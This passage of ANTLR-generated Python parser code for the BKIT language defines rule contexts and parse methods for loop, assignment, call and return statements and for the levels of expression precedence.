self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFor_stmt\" ):\n return visitor.visitFor_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 181\n self.match(BKITParser.FOR)\n self.state = 182\n self.match(BKITParser.LEFT_PAREN)\n self.state = 183\n self.match(BKITParser.ID)\n self.state = 184\n self.match(BKITParser.ASSIGN)\n self.state = 185\n self.expr()\n self.state = 186\n self.match(BKITParser.COMMA)\n self.state = 187\n self.expr()\n self.state = 188\n self.match(BKITParser.COMMA)\n self.state = 189\n self.expr()\n self.state = 190\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 191\n self.match(BKITParser.DO)\n self.state = 192\n self.stmt_list()\n self.state = 193\n self.match(BKITParser.ENDFOR)\n self.state = 194\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitWhile_stmt\" ):\n return visitor.visitWhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 196\n self.match(BKITParser.WHILE)\n self.state = 197\n self.expr()\n self.state = 198\n self.match(BKITParser.DO)\n self.state = 199\n self.stmt_list()\n self.state = 200\n self.match(BKITParser.ENDWHILE)\n self.state = 201\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitDowhile_stmt\" ):\n return visitor.visitDowhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 203\n self.match(BKITParser.DO)\n self.state = 204\n self.stmt_list()\n self.state = 205\n self.match(BKITParser.WHILE)\n self.state = 206\n self.expr()\n self.state = 207\n self.match(BKITParser.ENDDO)\n self.state = 208\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitAssign_stmt\" ):\n return visitor.visitAssign_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 212\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 210\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.state = 211\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 214\n self.match(BKITParser.ASSIGN)\n self.state = 215\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitBreak_stmt\" ):\n return visitor.visitBreak_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitContinue_stmt\" ):\n return visitor.visitContinue_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 219\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCall_stmt\" ):\n return visitor.visitCall_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 221\n self.match(BKITParser.ID)\n self.state = 222\n self.match(BKITParser.LEFT_PAREN)\n self.state = 233\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 223\n self.expr()\n self.state = 228\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 224\n self.match(BKITParser.COMMA)\n self.state = 225\n self.expr()\n self.state = 230\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 235\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 236\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitReturn_stmt\" ):\n return visitor.visitReturn_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 238\n self.match(BKITParser.RETURN)\n self.state = 240\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 239\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr\" ):\n return visitor.visitExpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_expr)\n self._la = 0 # Token type\n try:\n self.state = 247\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,14,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 242\n self.expr1(0)\n self.state = 243\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 244\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 246\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr1\" ):\n return visitor.visitExpr1(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 32\n self.enterRecursionRule(localctx, 32, self.RULE_expr1, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 250\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 257\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 252\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 253\n _la = self._input.LA(1)\n if not(_la==BKITParser.AND or _la==BKITParser.OR):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 254\n self.expr2(0) \n self.state = 259\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr2\" ):\n return visitor.visitExpr2(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 34\n self.enterRecursionRule(localctx, 34, self.RULE_expr2, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 261\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 268\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 263\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 264\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 265\n self.expr3(0) \n self.state = 270\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def STAR_FLOAT(self):\n return self.getToken(BKITParser.STAR_FLOAT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr3\" ):\n return visitor.visitExpr3(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 36\n self.enterRecursionRule(localctx, 36, self.RULE_expr3, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 272\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 279\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 274\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 275\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.STAR_INT) | (1 << BKITParser.STAR_FLOAT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.MOD))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 276\n self.expr4() \n self.state = 281\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr4\" ):\n return visitor.visitExpr4(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_expr4)\n try:\n self.state = 285\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.NOT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 282\n self.match(BKITParser.NOT)\n self.state = 283\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 284\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr5\" ):\n return visitor.visitExpr5(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_expr5)\n self._la = 0 # Token type\n try:\n self.state = 290\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 287\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.MINUS_FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 288\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 289\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr6\" ):\n return visitor.visitExpr6(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_expr6)\n try:\n self.state = 294\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,20,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 292\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 293\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_cellContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_cell\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray_cell\" ):\n return visitor.visitArray_cell(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array_cell(self):\n\n localctx = BKITParser.Array_cellContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_array_cell)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 296\n self.expr7()\n self.state = 301 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 297\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 298\n self.expr()\n self.state = 299\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 303 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr7\" ):\n return visitor.visitExpr7(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_expr7)\n try:\n self.state = 307\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 305\n self.function_call()\n pass\n\n elif la_ == 2:\n 